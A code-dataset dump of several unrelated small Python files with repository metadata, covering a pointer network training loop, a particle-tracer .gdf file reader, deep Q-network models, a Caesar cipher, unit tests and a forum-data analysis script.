if (step + 1) % 10 == 0:
duration = time.time() - start
print('Epoch [{}] loss: {} time:{:.2f}'.format(epoch, loss.item(), duration))
start = time.time()
def evaluateWordSort(model, epoch):
"""Evaluate after a train epoch"""
print('Epoch [{}] -- Evaluate'.format(epoch))
x_val, y_val, text_val = batch(4, True)
out, _ = model(x_val, y_val, teacher_force_ratio=0.)
out = out.permute(1, 0)
for i in range(out.size(0)):
print("=============================================")
print("yref", y_val[i], out[i], y_val[i] - out[i])
print("orig", text_val[i])
v = torch.Tensor.cpu(out[i]).numpy()
print("[", end="")
for index in v:
print(text_val[i][index]+" ", end="")
print("]")
if config.GPU == True:
ptrNet = PointerNetwork(config.HIDDEN_SIZE).cuda()
else:
ptrNet = PointerNetwork(config.HIDDEN_SIZE)
optimizer = optim.Adam(ptrNet.parameters())
program_starts = time.time()
for epoch in range(EPOCHS):
train(ptrNet, optimizer, epoch + 1)
evaluateWordSort(ptrNet, epoch + 1)
now = time.time()
print("It has been {0} seconds since the loop started".format(now - program_starts))
| true |
6dcb109eabb3126a94c0a153562ebd879cb47ba2 | Python | VELA-CLARA-software/Software | /Apps/AlignOnBPMs/SimulationFramework/Modules/read_gdf_file.py | UTF-8 | 9,798 | 2.515625 | 3 | [] | no_license | """Reads in files from General Particle Tracer .gdf files
"""
from __future__ import division
# from pylab import *
import time
import struct
import os
import sys
import numpy as np
#Constants
GDFNAMELEN = 16; #Length of the ascii-names
GDFID = 94325877; #ID for GDF
#Data types
t_ascii = int('0001', 16) #ASCII character
t_s32 = int('0002', 16) #Signed long
t_dbl = int('0003', 16) #Double
t_undef = int('0000', 16) #Data type not defined
t_null = int('0010', 16) #No data
t_u8 = int('0020', 16) #Unsigned char
t_s8 = int('0030', 16) #Signed char
t_u16 = int('0040', 16) #Unsigned short
t_s16 = int('0050', 16) #Signed short
t_u32 = int('0060', 16) #Unsigned long
t_u64 = int('0070', 16) #Unsigned 64bit int
t_s64 = int('0080', 16) #Signed 64bit int
t_flt = int('0090', 16) #Float
#Block types
t_dir = 256 # Directory entry start
t_edir = 512 # Directory entry end
t_sval = 1024 # Single valued
t_arr = 2048 # Array
class grab_group(object):
def __init__(self, name):
self.name = name
self.attrs = {}
self.groups = {}
def create_group(self, name):
self.groups[name] = self.group(name)
return self.groups[name]
class group(object):
def __init__(self, name):
self.name = name
self.datasets = []
def create_dataset(self, name, data=()):
self.datasets.append(name)
setattr(self,name, data)
class read_gdf_file(object):
###############################################################################
def create_grab_group(self, name):
self.grab_groups[name] = grab_group(name)
return self.grab_groups[name]
@property
def positions(self):
positions = []
for datagrab in self.grab_groups.values():
if hasattr(datagrab.groups['param'],'position'):
positions.append(datagrab.groups['param'].position)
return positions
def get_position(self, position):
for datagrab in self.grab_groups.values():
if hasattr(datagrab.groups['param'],'position'):
if str(datagrab.groups['param'].position) == str(position):
return datagrab.groups['data']
@property
def times(self):
times = []
for datagrab in self.grab_groups.values():
if hasattr(datagrab.groups['param'],'time'):
times.append(datagrab.groups['param'].time)
return times
def get_time(self, time):
for datagrab in self.grab_groups.values():
if hasattr(datagrab.groups['param'],'time'):
if str(datagrab.groups['param'].time) == str(time):
return datagrab.groups['data']
def get_grab(self, grab_group_number=0):
for name, datagrab in self.grab_groups.items():
if name == 'datagrab_' + str(grab_group_number):
return datagrab.groups['data']
def __init__(self, filename):
self.attrs = {}
self.grab_groups = {}
self.filename = filename
with open(self.filename, 'rb') as f: #Important to open in binary mode 'b' to work cross platform
#Read the GDF main header
gdf_id_check = struct.unpack('i', f.read(4))[0]
if gdf_id_check != GDFID:
raise RuntimeWarning('File is not a .gdf file')
self.attrs['time_created'] = struct.unpack('i', f.read(4))[0]
#get creator name and use string part upto zero-character
creator = list(f.read(GDFNAMELEN))
creator = [struct.unpack('B', element)[0] for element in creator]
creator_name = []
for element in creator:
if element is 0:
break
else:
creator_name.append(chr(element))
self.attrs['creator_name'] = creator_name
#get destination and use string part upto zero-character
dest = f.read(GDFNAMELEN)
dest = [struct.unpack('B', element)[0] for element in dest]
destination = []
for element in dest:
if element is 0:
break
else:
destination.append(chr(element))
self.attrs['destination'] = ''.join(destination)
#get other metadata about the GDF file
major = struct.unpack('B', f.read(1))[0]
minor = struct.unpack('B', f.read(1))[0]
self.attrs['gdf_version'] = str(major) + '.' + str(minor)
major = struct.unpack('B', f.read(1))[0]
minor = struct.unpack('B', f.read(1))[0]
self.attrs['creator_version'] = str(major) + '.' + str(minor)
major = struct.unpack('B', f.read(1))[0]
minor = struct.unpack('B', f.read(1))[0]
self.attrs['destination_version'] = str(major) + '.' + str(minor)
f.seek(2, 1) # skip to next block
#Create first hdf group and sub groups for data to be put into
#First group is called "datagrab" because it could be output at a particular time, or the projection at a particular position
grab_group_number = 0
grab_group = self.create_grab_group('datagrab_' + str(grab_group_number))
grab_group.attrs['grab_number'] = grab_group_number
data_group = grab_group.create_group('data')
param_group = grab_group.create_group('param')
#Read GDF data blocks
lastarr = False
while True:
if f.read(1) == '':
break
f.seek(-1, 1)
#Read GDF block header
name = f.read(16)
typee = struct.unpack('i', f.read(4))[0]
size = struct.unpack('i', f.read(4))[0]
#Get name
import string
printable = set(string.printable)
def find_name(name):
found_str = ""
for char in name:
if char in printable:
found_str += char
elif len(found_str) >= 1:
return found_str
else:
found_str = ""
name = str(find_name(name))
name = name
#Get block type
dir = int(typee & t_dir > 0)
edir = int(typee & t_edir > 0)
sval = int(typee & t_sval > 0)
arr = int(typee & t_arr > 0)
#Get data type
dattype = typee & 255
#Check if array block is finished
if lastarr and not arr:
#We save the stuff as we go rather than storing it in local dictionaries and creating all the groups at the end. Here we make the groups for next time step, as this code only runs when all data current block has been extracted
grab_group_number += 1
grab_group = self.create_grab_group('datagrab_' + str(grab_group_number))
grab_group.attrs['grab_number'] = grab_group_number
data_group = grab_group.create_group('data')
param_group = grab_group.create_group('param')
#Read single value
if sval:
if dattype == t_dbl:
# print 'new dbl = ', name
value = struct.unpack('d', f.read(8))[0]
# print ' dbl = ', value
param_group.create_dataset(name, data=value)
elif dattype == t_null:
# print 'new null = ', name
pass
elif dattype == t_ascii:
# print 'new ascii = ', name
value = str(f.read(size))
value = value.strip(' \t\r\n\0')
# print ' ascii = ', value
try:
param_group.create_dataset(name, data=value)
except RuntimeError:
del param_group[name]
param_group.create_dataset(name, data=value)
elif dattype == t_s32:
# print 'new s32 = ', name
value = struct.unpack('i', f.read(4))[0]
param_group.create_dataset(name, data=value)
else:
print 'unknown datatype of value!!!'
print 'name=', name
print 'type=', typee
print 'size=', size
value = f.read(size)
#Read data array
if arr:
if dattype == t_dbl:
if (size % 8) != 0:
raise RuntimeWarning('Tried to save an array of doubles, but the array size is not consistant with that of doubles.')
value = np.fromfile(f, dtype=np.dtype('f8'), count=int(size/8))
data_group.create_dataset(name, data=value)
# print 'new dataset = ', name
else:
print 'unknown datatype of value!!!'
print 'name=', name
print 'type=', typee
print 'size=', size
value = f.read(size)
lastarr = arr;
f.close()
| true |
8bb17a007730f2c60b3965c171cd3b68637af165 | Python | hengyuan-hu/dqn-hw | /model.py | UTF-8 | 9,654 | 2.828125 | 3 | [] | no_license | """Implement the Q network as a torch.nn Module"""
import torch
import torch.nn as nn
from torch.autograd import Variable
import utils
class QNetwork(nn.Module):
def __init__(self, num_frames, frame_size, num_actions, optim_args, net_file):
"""
num_frames: i.e. num of channels of input
frame_size: int, frame has to be square for simplicity
num_actions: i.e. num of output Q values
"""
super(QNetwork, self).__init__()
self._build_model((num_frames, frame_size, frame_size), num_actions)
utils.init_net(self, net_file)
self.cuda()
self.optim = torch.optim.RMSprop(self.parameters(), **optim_args)
def _build_model(self, input_shape, num_actions):
"""
input_shape: (num_channel, frame_size, frame_size)
num_actions: decides num of outputs of q_net
"""
raise NotImplementedError
def forward(self, x):
raise NotImplementedError
def loss(self, x, a, y):
utils.assert_eq(a.dim(), 2)
q_vals = self.forward(Variable(x))
utils.assert_eq(q_vals.size(), a.size())
y_pred = (q_vals * Variable(a)).sum(1)
err = nn.functional.smooth_l1_loss(y_pred, Variable(y))
return err
def train_step(self, x, a, y, grad_clip=None):
err = self.loss(x, a, y)
err.backward()
if grad_clip:
nn.utils.clip_grad_norm(self.parameters(), grad_clip)
self.optim.step()
self.zero_grad()
return err.data[0]
class DQNetwork(QNetwork):
def _build_model(self, input_shape, num_actions):
conv = nn.Sequential()
conv.add_module('conv1', nn.Conv2d(input_shape[0], 32, 8, 4))
conv.add_module('relu1', nn.ReLU(inplace=True))
conv.add_module('conv2', nn.Conv2d(32, 64, 4, 2))
conv.add_module('relu2', nn.ReLU(inplace=True))
conv.add_module('conv3', nn.Conv2d(64, 64, 3, 1))
conv.add_module('relu3', nn.ReLU(inplace=True))
num_fc_in = utils.count_output_size((1,)+input_shape, conv)
num_fc_out = 512
fc = nn.Sequential()
fc.add_module('fc1', nn.Linear(num_fc_in, num_fc_out))
fc.add_module('fc_relu1', nn.ReLU(inplace=True))
fc.add_module('output', nn.Linear(num_fc_out, num_actions))
self.conv = conv
self.fc = fc
def forward(self, x):
x.div_(255.0)
y = self.conv(x)
y = y.view(y.size(0), -1)
y = self.fc(y)
utils.assert_eq(y.dim(), 2)
return y
class DuelingQNetwork(QNetwork):
def _build_model(self, input_shape, num_actions):
conv = nn.Sequential()
conv.add_module('conv1', nn.Conv2d(input_shape[0], 32, 8, 4))
conv.add_module('relu1', nn.ReLU(inplace=True))
conv.add_module('conv2', nn.Conv2d(32, 64, 4, 2))
conv.add_module('relu2', nn.ReLU(inplace=True))
conv.add_module('conv3', nn.Conv2d(64, 64, 3, 1))
conv.add_module('relu3', nn.ReLU(inplace=True))
num_fc_in = utils.count_output_size((1,)+input_shape, conv)
num_fc_out = 512
fc_a = nn.Sequential()
fc_a.add_module('fc1', nn.Linear(num_fc_in, num_fc_out))
fc_a.add_module('fc_relu1', nn.ReLU(inplace=True))
fc_a.add_module('adv', nn.Linear(num_fc_out, num_actions))
fc_v = nn.Sequential()
fc_v.add_module('fc2', nn.Linear(num_fc_in, num_fc_out))
fc_v.add_module('fc_relu2', nn.ReLU(inplace=True))
fc_v.add_module('val', nn.Linear(num_fc_out, 1))
self.conv = conv
self.fc_a = fc_a
self.fc_v = fc_v
def forward(self, x):
x.div_(255.0)
y = self.conv(x)
y = y.view(y.size(0), -1)
a = self.fc_a(y)
v = self.fc_v(y) - a.mean(1)
y = a + v.expand_as(a)
utils.assert_eq(y.dim(), 2)
return y
class PredDuelingQNetwork(QNetwork):
def _build_model(self, input_shape, num_actions):
conv = nn.Sequential()
conv.add_module('conv1', nn.Conv2d(input_shape[0], 32, 8, 4))
conv.add_module('relu1', nn.ReLU(inplace=True))
conv.add_module('conv2', nn.Conv2d(32, 64, 4, 2))
conv.add_module('relu2', nn.ReLU(inplace=True))
conv.add_module('conv3', nn.Conv2d(64, 64, 3, 1))
conv.add_module('relu3', nn.ReLU(inplace=True))
num_fc_in = utils.count_output_size((1,)+input_shape, conv)
num_fc_out = 512
fc_a = nn.Sequential()
fc_a.add_module('fc_a', nn.Linear(num_fc_in, num_fc_out))
fc_a.add_module('relu_a', nn.ReLU(inplace=True))
fc_a.add_module('adv', nn.Linear(num_fc_out, num_actions))
fc_v = nn.Sequential()
fc_v.add_module('fc_v', nn.Linear(num_fc_in, num_fc_out))
fc_v.add_module('relu_v', nn.ReLU(inplace=True))
fc_v.add_module('val', nn.Linear(num_fc_out, 1))
fc_pred_v = nn.Sequential()
fc_pred_v.add_module('fc_pred_v', nn.Linear(num_fc_in, num_fc_out))
fc_pred_v.add_module('relu_pred_v', nn.ReLU(inplace=True))
fc_pred_v.add_module('pred_v', nn.Linear(num_fc_out, num_actions))
self.conv = conv
self.fc_a = fc_a
self.fc_v = fc_v
self.fc_pred_v = fc_pred_v
def forward(self, x, pred):
# TODO: better naming if works
x.div_(255.0)
conv = self.conv(x)
conv = conv.view(conv.size(0), -1)
a = self.fc_a(conv)
a.sub_(a.mean(1).expand_as(a))
v = self.fc_v(conv)
q = a + v.expand_as(a)
utils.assert_eq(q.dim(), 2)
pred_v = None
if pred:
pred_v = self.fc_pred_v(conv)
utils.assert_eq(pred_v.size(), q.size())
return q, v, pred_v
def loss(self, x, a, y, next_v):
q_vals, _, pred_v = self.forward(Variable(x), pred=True)
a = Variable(a)
y_pred = (q_vals * a).sum(1)
y_err = nn.functional.smooth_l1_loss(y_pred, Variable(y))
next_v_pred = (pred_v * a).sum(1)
next_v_err = nn.functional.smooth_l1_loss(next_v_pred, Variable(next_v))
return y_err, next_v_err
def train_step(self, x, a, y, next_v, grad_clip=None):
y_err, next_v_err = self.loss(x, a, y, next_v)
err = y_err + next_v_err
err.backward()
if grad_clip:
nn.utils.clip_grad_norm(self.parameters(), grad_clip)
self.optim.step()
self.zero_grad()
return y_err.data[0], next_v_err.data[0]
class SinglePredDuelingQNetwork(QNetwork):
def _build_model(self, input_shape, num_actions):
conv = nn.Sequential()
conv.add_module('conv1', nn.Conv2d(input_shape[0], 32, 8, 4))
conv.add_module('relu1', nn.ReLU(inplace=True))
conv.add_module('conv2', nn.Conv2d(32, 64, 4, 2))
conv.add_module('relu2', nn.ReLU(inplace=True))
conv.add_module('conv3', nn.Conv2d(64, 64, 3, 1))
conv.add_module('relu3', nn.ReLU(inplace=True))
num_fc_in = utils.count_output_size((1,)+input_shape, conv)
num_fc_out = 512
fc_a = nn.Sequential()
fc_a.add_module('fc_a', nn.Linear(num_fc_in, num_fc_out))
fc_a.add_module('relu_a', nn.ReLU(inplace=True))
fc_a.add_module('adv', nn.Linear(num_fc_out, num_actions))
fc_v = nn.Sequential()
fc_v.add_module('fc_v', nn.Linear(num_fc_in, num_fc_out))
fc_v.add_module('relu_v', nn.ReLU(inplace=True))
fc_v.add_module('val', nn.Linear(num_fc_out, 1))
# fc_pred_v = nn.Sequential()
self.pred_v_fc1 = nn.Linear(num_fc_in, num_fc_out)
self.pred_v_relu1 = nn.ReLU(inplace=True)
self.pred_v_output = nn.Linear(num_fc_out+1, 1)
self.conv = conv
self.fc_a = fc_a
self.fc_v = fc_v
def forward(self, x, pred):
# TODO: better naming if works
x.div_(255.0)
conv = self.conv(x)
conv = conv.view(conv.size(0), -1)
a = self.fc_a(conv)
a.sub_(a.mean(1).expand_as(a))
v = self.fc_v(conv)
q = a + v.expand_as(a)
utils.assert_eq(q.dim(), 2)
pred_v = None
if pred:
action = a.max(1)[1].data.float()
# print action[:10]
pred_v = nn.functional.relu(self.pred_v_fc1(conv))
pred_v = torch.cat((pred_v, Variable(action)), 1)
# print pred_v.size()
pred_v = self.pred_v_output(pred_v)
# print '>>>', pred_v.size()
# pred_v = self.fc_pred_v(conv)
# utils.assert_eq(pred_v.size(), q.size())
return q, v, pred_v
def loss(self, x, a, y, next_v):
q_vals, _, pred_v = self.forward(Variable(x), pred=True)
a = Variable(a)
y_pred = (q_vals * a).sum(1)
y_err = nn.functional.smooth_l1_loss(y_pred, Variable(y))
# next_v_pred = (pred_v * a).sum(1)
next_v_err = nn.functional.smooth_l1_loss(pred_v, Variable(next_v))
return y_err, next_v_err
def train_step(self, x, a, y, next_v, grad_clip=None):
y_err, next_v_err = self.loss(x, a, y, next_v)
err = y_err + next_v_err
err.backward()
if grad_clip:
nn.utils.clip_grad_norm(self.parameters(), grad_clip)
self.optim.step()
self.zero_grad()
return y_err.data[0], next_v_err.data[0]
if __name__ == '__main__':
import copy
qn = QNetwork(4, 84, 4, 0.1)
print qn
for p in qn.parameters():
print p.mean().data[0], p.std().data[0]
fake_input = Variable(torch.cuda.FloatTensor(10, 4, 84, 84), volatile=True)
print qn(fake_input).size()
qn_target = copy.deepcopy(qn)
| true |
99616e51b80c7512c707ba78aae9965995e040c5 | Python | bunkov/informatics | /2.Work24/Caesar.py | UTF-8 | 1,305 | 3.359375 | 3 | [] | no_license | class Caesar:
alphabet = "абвгдеёжзийклмнопрстуфхцчшщъыьэюя"
def __init__(self, key):
lowercase_code = {self.alphabet[i]:self.alphabet[(i+key)%len(self.alphabet)] for i in range(len(self.alphabet))}
uppercase_code = {self.alphabet[i].upper():self.alphabet[(i+key)%len(self.alphabet)].upper() for i in range(len(self.alphabet))}
self._encode = dict(lowercase_code)
self._encode.update(uppercase_code)
self._decode = invert_dict(self._encode)
def encode(self, line):
if len(line) == 1:
return self._encode[line] if line in self._encode else line
else:
return ''.join([self.encode(char) for char in line])
def decode(self, line):
if len(line) == 1:
return self._decode[line] if line in self._decode else line
else:
return ''.join([self.decode(char) for char in line])
def invert_dict(d):
newdict = {}
for (k, v) in d.items():
newdict.setdefault(v, []).append(k)
newdict[v] = ''.join(str(elem) for elem in newdict[v])
return newdict
key = int(input('Введите ключ:'))
cipher = Caesar(key)
print('Кодирование')
line = input()
while line:
print(cipher.encode(line))
line = input()
print('Декодирование')
line = input()
while line:
print(cipher.decode(line))
line = input()
| true |
e1f3fb677bcd9fc0d7ab6f00d41ac7dd87a8668c | Python | dww100/bac | /common/test_pdb_io.py | UTF-8 | 1,124 | 2.546875 | 3 | [
"Apache-2.0"
] | permissive | # This Test opens a simple pdb file (data/init_pdbs/pr/1mui_wat.pdb)
# It then attempts to manipulate this file using MDAnalyis.
from pdb_io import *
from operator import itemgetter, attrgetter
from nose.tools import assert_equals
data_dir = "../data"
def test_load_pdb_file():
load_pdb("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
#universe = Universe(topology, trajectory)
print "PDB file loaded!"
def test_print_pdb_file():
print_pdb_file("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
def test_pdb_select_and_merge():
u = load_pdb("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
target = select_atoms(u, "segid A")
s1 = select_atoms(u, "segid A and resnum 10")
s2 = select_atoms(u, "segid A and not resnum 10")
s3 = s2 + s1
#if s3 is sorted properly, then the last element should be s2[-1]
s4 = sort_atom_selection(s3)
assert_equals(s2[-1].number, s4[-1].number)
s5 = merge_atom_selections([s2,s1])
assert_equals(s2[-1].number, s5[-1].number)
def test_write_pdb_file():
u = load_pdb("%s/init_pdbs/pr/1mui_wat.pdb" % data_dir)
s = u.selectAtoms("all")
write_pdb_file(s, "test.pdb")
| true |
a3d7aefc9aeb825a4e97248bcf8cc1c1eb9c5937 | Python | feizhihui/Coursera-Python-Repo | /lecture_4/pandas_plot.py | UTF-8 | 204 | 2.953125 | 3 | [] | no_license | # encoding=utf-8
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
x = np.linspace(0, 1)
y = np.sin(4 * np.pi * x) * np.exp(-5 * x)
t = pd.DataFrame(y, index=x)
t.plot()
plt.show()
| true |
f0b3abc16201d520f5b4383dc8aef1f0384903c8 | Python | olchowik/d_repo | /typeii/typeii/enzymes/models_old.py | UTF-8 | 5,173 | 2.671875 | 3 | [] | no_license | from django.db import models
class Genome(models.Model):
#genome name
name = models.CharField(unique=True, max_length=70)
#This is what gets printed when we call this objects
def __unicode__(self):
return 'Genome of: ' + self.name
class DNAPiece(models.Model):
#Reference to the genome (Genome-type object) in which the piece of DNS is located.
genome = models.ForeignKey(Genome)
#Name of the .ptt file (from the ncbi ftp site) with data on this piece of DNA
name = models.CharField(unique=True, max_length=70)
def __unicode__(self):
return ('DNA piece: ' + self.name
#use self.ForeignKey.attribute to access attribute of the Foreign Key -> here genome
+ ' in: ' + self.genome.name)
'''To improve:
subunit_composition, family_composition, subunit_family_composition, and probebly system_kind
Could have been created dynamically basing of proteind when object is created.
**This would simplify new data entry**
Proposed solution/
1)use __init__ function??
2)get all the proteins that belong to this system: system.protein_set
3)create subunit_composition using system.protein_set.subunit_kind
and family_composition system.protein_set.subunit_kind.hammer_cluster
4)subunit_family_composition basing on two previously created fields
'''
class System(models.Model):
#reference to a piece of DNA in the cell (DNAPiece-type object) (.ptt file) on which this system is located
dnapiece = models.ForeignKey(DNAPiece)
# e.g. MRS means that there is M, R and S subunit exactly in this order on the DNA
subunit_composition = models.CharField(max_length=70)
# G_G_M lists families to which each subunit was classified
family_composition = models.CharField(max_length=70)
# e.g. MG_SG_RA means subunit M from family G, subunit S from G, R from family A.
subunit_family_composition = models.CharField(max_length=140)
# This is result of our 'inner classification'. If system had 1 M 1R and 1 or more S
# and all the subunits belonged to the same family it was automatically classified into this family
system_kind = models.CharField(max_length=10)
#
real_name = models.CharField(max_length=20)
def __unicode__(self):
return ('System number: ' + str(self.id)
+ ' Composed of: ' + self.subunit_composition
+ ' subunits that belong to family ' + self.family_composition
#it's a bit redundant:
#+ ' respectively, you can write it as: ' + self.subunit_family_composition
+ '. System classified as: ' + self.system_kind
#use self.ForeignKey.AnotherForeignKey.attribute
+' It is in: ' + self.dnapiece.genome.name
+' on: ' + self.dnapiece.name)
class Protein(models.Model):
#reference to a system (System-type object) that this protein belongs to
system = models.ForeignKey(System)
# e.g. 1234567 ->GI
gene_id = models.CharField(unique=True, max_length=20)
# e.g.1456...2345 position on the DNA strand (from .ptt file)
genome_location = models.CharField(max_length=30)
# e.g. + -> the DNA strand (plus or minus)
strand = models.CharField(max_length=5)
# e.g. 14 number of bp between the gene and previous gene in this system
# 0 for start of the system
margin_left = models.IntegerField()
#<System>->first protein of the system or 2 or more subunits
#<middle> in the middle of the system
#</System> last protein of the system
#<Solitary> -> M R or S but not in any of the systems
#<not> It is not M , R or S subunit
system_part = models.CharField(max_length=20)
#Family as defined by clans (only 'most confident' proteins attributed to clusters)
clans_cluster = models.CharField(max_length=5) #nie ma w all-tabelce
#Family as assigned by HMMer
hammer_cluster = models.CharField(max_length=5)
# M for methyltransferase
# R for restrictase
# S for specificity subunit
# for proteins that are not M R or S
subunit_kind = models.CharField(max_length=5)
# length of the protein in bp
dna_length = models.IntegerField()
#amino acid sequence of this protein
aa_sequence = models.TextField()
#result
hh_pfam_id = models.CharField(max_length=10)
hh_pfam_short_desc = models.CharField(max_length=40)
hh_probability = models.DecimalField(max_digits=5, decimal_places=2)
hh_e_value = models.CharField(max_length=10)
hh_pfam_desc = models.TextField()
# Probabilities form Alberta's data
m_probability = models.IntegerField() #Wilno
r_probability = models.IntegerField() #Wilno
s_probability = models.IntegerField() #Wilno
def __unicode__(self):
s_kind = ', subunit kind: '
if self.subunit_kind == '':
s_kind = ''
return ('Gene id: ' + self.gene_id + ', located on ' + self.system.dnapiece.name
+ ' in ' + self.system.dnapiece.genome.name + ', system part: '
+ self.system_part + s_kind + self.subunit_kind + ' ' + self.hh_pfam_short_desc)
| true |
4403d5fd6eb14684c13678dd48677274caaddf53 | Python | AdelkaPa/pytest_travis_demo | /test_fizzbuzz.py | UTF-8 | 888 | 3.125 | 3 | [] | no_license | from fizzbuzz import fizzbuzz
import pytest
def test_fb_is_callable():
fizzbuzz(1)
def test_fb_returns_str():
assert isinstance(fizzbuzz(1), str)
@pytest.mark.parametrize('num', [1, 2, 4])
def test_fb_regular_is_self(num):
assert int(fizzbuzz(num)) == num
@pytest.mark.parametrize('num', [3, 6, 9])
def test_fb_regular_is_fizz(num):
assert fizzbuzz(num) == 'fizz'
@pytest.mark.parametrize('num', [5, 20, 50])
def test_fb_regular_is_buzz(num):
assert fizzbuzz(num) == 'buzz'
@pytest.mark.parametrize('num', [15, 30, 3000])
def test_fb_regular_is_fizzbuzz(num):
assert fizzbuzz(num) == 'fizzbuzz'
def test_fb_raises_typerror_on_str():
with pytest.raises(TypeError):
fizzbuzz("")
@pytest.mark.parametrize('num', [ "", 1.5, [], 4+3j])
def test_fb_regular_is_fizzbuzz(num):
with pytest.raises(TypeError):
fizzbuzz(num)
| true |
15c294f43db9d19ed2a2176ab1c504042112c06a | Python | 15cs026priyanka/yuvankrish123 | /index2.py | UTF-8 | 284 | 3.546875 | 4 | [] | no_license | a=int(input("enter the number ")):
while (1)
while (i < n) && ((i+arr[i]) % 2 == 0)
i++
while (0 <= j) && ((j+arr[j]) % 2 == 0)
j++
if j <= i
break
swap(arr[i], arr[j])
print(" display the sorted number in index")
| true |
cda8ef9e8c58850232ec3faa99884e7bc7c21380 | Python | dvir88/finewoodworking-datascience-python | /datasetHandler.py | UTF-8 | 4,270 | 3.34375 | 3 | [] | no_license | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import os
import seaborn as sns
"""
Pandas
"""
def save_post_dataset(data):
df = pd.DataFrame.from_dict(data)
if not os.path.exists('./finewood_articles.csv'):
df.to_csv('finewood_articles.csv', mode='w', index=False, header=True)
else:
df.to_csv('finewood_articles.csv', mode='a', index=False, header=False)
# based on the word, we want to get the most popular/frequent question in a category
def get_most_popular_question_category(df, category, word):
df_copy = df.copy()
df_copy = df.loc[(df['Category'] == category) & (df['Questions'].str.contains(word.lower()))]
return df_copy
def most_popular_category_in_order(df):
df_copy = df.copy()
return df_copy['Category'].value_counts().nlargest().sort_index()
# most popular article will include most replies in the most popular category
def get_most_popular_article(df):
df_copy = df.copy()
most_popular_categories = most_popular_category_in_order(df)
return df_copy.loc[(df['Category'] == most_popular_categories.index[0]) & (df['Replies'] == df['Replies'].max())]
def get_all_month_articles(df, month):
df_copy = df.copy()
return df_copy.loc[df['Month'] == month]
def get_all_year_articles(df, year):
df_copy = df.copy()
return df_copy.loc[df['Year'] == year]
# the way you define the most questions in a given period or month in a year is the year and month count
def get_most_replies_in_month_year(df):
df_copy = df.copy()
max_articles_year = df_copy['Year'].value_counts().idxmax()
print(max_articles_year)
return df_copy.loc[(df['Year'] == max_articles_year) & (df['Replies'] == df['Replies'].max())]
def get_questions_count_each_year(df):
df_copy = df.copy()
return df_copy['Year'].value_counts()
"""
Matplotlib
"""
# One graph will be about the number of questions in each year (bar chart and pie)
# Two graph will be about the number of replies in every month for a specific year (bar chart and pie)
# Three graph will be about the number of questions based on the given word (bar chart)
# Four graph will be a plot of all the categories(plot) based on year(x) and the number of replies(y)
def bar_questions_each_year(df):
df_years = get_questions_count_each_year(df)
df_years.plot(x=df_years.index, y=df_years.values, kind='bar')
plt.show()
def pie_questions_each_year(df):
df_years = get_questions_count_each_year(df)
df_years.plot(x=df_years.index, y=df_years.values, kind='pie')
plt.show()
def bar_replies_each_month_year(df, year):
df_year = get_all_year_articles(df, year)
df_months = df_year['Month'].value_counts()
df_months.plot(x=df_months.index, y=df_months.values, kind='bar')
plt.show()
def pie_replies_each_month_year(df, year):
df_year = get_all_year_articles(df, year)
df_months = df_year['Month'].value_counts()
df_months.plot(x=df_months.index, y=df_months.values, kind='pie')
plt.show()
def bar_questions_based_on_words(df, category, words):
questions_count = []
for word in words:
df_popular = get_most_popular_question_category(df, category, word)
questions_count.append(len(df_popular))
fig = plt.figure(figsize = (10, 5))
# creating the bar plot
plt.bar(words, questions_count, color ='maroon',
width = 0.4)
plt.xlabel("Topics")
plt.ylabel("Count Topics")
plt.title("Number of times the words showed up")
plt.show()
def create_colors_plot(df):
df_copy = df.copy()
# most_top_categories = most_popular_category_in_order(df)
categories = np.unique(df_copy['Category'])
categories = list(filter(lambda x: x != 'Gary Ragowski' or x != 'Hand Tools', categories))
colors = np.linspace(0, 1, len(categories))
colordict = dict(zip(categories, colors))
df_copy["Color"] = df_copy['Category'].apply(lambda x: colordict[x])
return df_copy
def plot_categories_per_year(df):
df_copy = create_colors_plot(df)
fg = sns.FacetGrid(data=df_copy, hue='Category', hue_order=categories, aspect=3.61, height=6.61)
fg.map(plt.scatter, 'Year', 'Replies').add_legend()
# sns.scatterplot(data=df_copy,x='Year',y='Replies', c=df_copy['Color'])
plt.show() | true |
8bcd6b7bc7029b05079f30f490dcad9b6f00ba55 | Python | begibeggineta/Gso_Git | /git_gso.py | UTF-8 | 328 | 3.046875 | 3 | [] | no_license | #Bergþór Ingi Birgirsson
#GSÖ2
#25.1.2017
Text = input("veldu hvað txt skjalið á að heita")
F = open(Text+".txt","w+")
F.write("Hello my honey Hello my baby hello my night time gaaal")
F.close()
F = open(Text+".txt","+w")
innhald = input("Hvað viltu skrifa inn í texta skjalið")
for i in range(0,3):
F.write(innhald +"\n")
F.close() | true |
e5b500b79a6a44bb7e4d9673246e6db83248f962 | Python | 1082sqnatc/missionspacelab2019 | /testdaynight.py | UTF-8 | 676 | 2.546875 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/usr/bin/python3
import time
from os import listdir
from src.dayornight import isDay
#def take_picture():
# print("pic taken")
# TODO main executable file, pulls in cadets' libraries from lib fold
def main():
files = listdir ("../Sample_Data/")
for fname in files:
print (str("Processing" + fname)) # Prints the processing notification
imageFile = "../Sample_Data/" + fname #Stores the current file name
# t0 = time.time()
result = isDay(imageFile)
# t1 = time.time()
# t = t1 - t0
# print (str(t))
# print(result)
# Now process a folder of image...
if __name__ == '__main__':
main()
| true |
7f094780c5e0c8b9beb3a899f5e611ec8177a987 | Python | fengpenghui/proj01 | /qytang/news.py | UTF-8 | 186 | 2.671875 | 3 | [] | no_license | #! /usr/bin/env python3
# coding: utf-8
# github: https://github.com/fengpenghui
# 码云: https://gitee.com/fengpenghui0923
yuyan=input()
new= yuyan[1:]+'-'+yuyan[0]+'y'
print(new)
| true |
a148cb061a71cd74fa737e79d0a0895c9b3c34a3 | Python | ShuNayak/LeetCode | /ZombieSearch.py | UTF-8 | 1,045 | 3.28125 | 3 | [] | no_license | from typing import List
import collections
class Solution:
def makeZombie(self, grid: List[List])->int:
if grid is None or len(grid)==0:
return -1
human = 0
zombie = collections.deque()
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j]==0:
human+=1
else:
zombie.append((i,j))
hours = 0
while zombie:
for _ in range(len(zombie)):
value_x, value_y = zombie.popleft()
for x, y in [(value_x,value_y+1),(value_x, value_y-1),(value_x+1, value_y),(value_x-1,value_y)]:
if 0<=x<len(grid) and 0<=y<len(grid[0]):
if grid[x][y]==0:
grid[x][y]=1
human-=1
zombie.append((x,y))
hours+=1
